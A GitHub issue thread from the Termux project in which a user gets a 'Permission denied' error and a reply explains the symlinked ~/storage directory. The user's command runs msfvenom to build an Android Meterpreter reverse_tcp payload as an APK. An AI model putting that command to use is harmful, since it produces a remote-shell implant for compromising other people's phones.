### ISSUE TITLE
bash: .....  : Permission denied

### ISSUE THREAD

**Issue by HH2311** [termux/termux-app#393]
Hi, I've been using Termux for couple of weeks and I can say that is a great app, well done! Although I have a problem, maybe it's a noob problem and I did something wrong, you can help me for sure. I installed Metasploit on Termux, it should work no problem. My problem:
$ ./msfvenom -p android/meterpreter/reverse_tcp LHOST=xxx.xxx.x.xx LPORT=xxxx R > /storage/app.apk
$ bash: /storage/app.apk: Permission denied
("x" is data that choose to use)
I am not an expert in Metasploit, but I think that it's not a command problem.
In Setting the storage permission is activated, I know somethin about $ termux-setup-storage, I am not sure, I tried. Most probable I do something wrong like a noob. Hope you can help me!
(Sorry for my grammatical wrongs, I am not a native english speaker.)

**Comment by HH2311** [comment]
The Metasploit is proprely installed, I do not think that this is the problem and I knew some tutorials The payload create command works no problem in that tutorials.

**Comment by mageApprentissage** [comment]
@HH2311 The <code>~/storage/</code> directory, as it pertains to Termux, houses symlinked  shortcuts to accessible directories on the internal SD, thus you cannot write to it.

After running <code>termux-setup-storage</code> you can run <code>ls -l ~/storage</code> to see the naming convention used by Termux for frequently traversed paths. Note the <code>~/storage/shared</code> path is relative to <code>/storage/emulated/0</code>, the default folder of your device's internal storage.
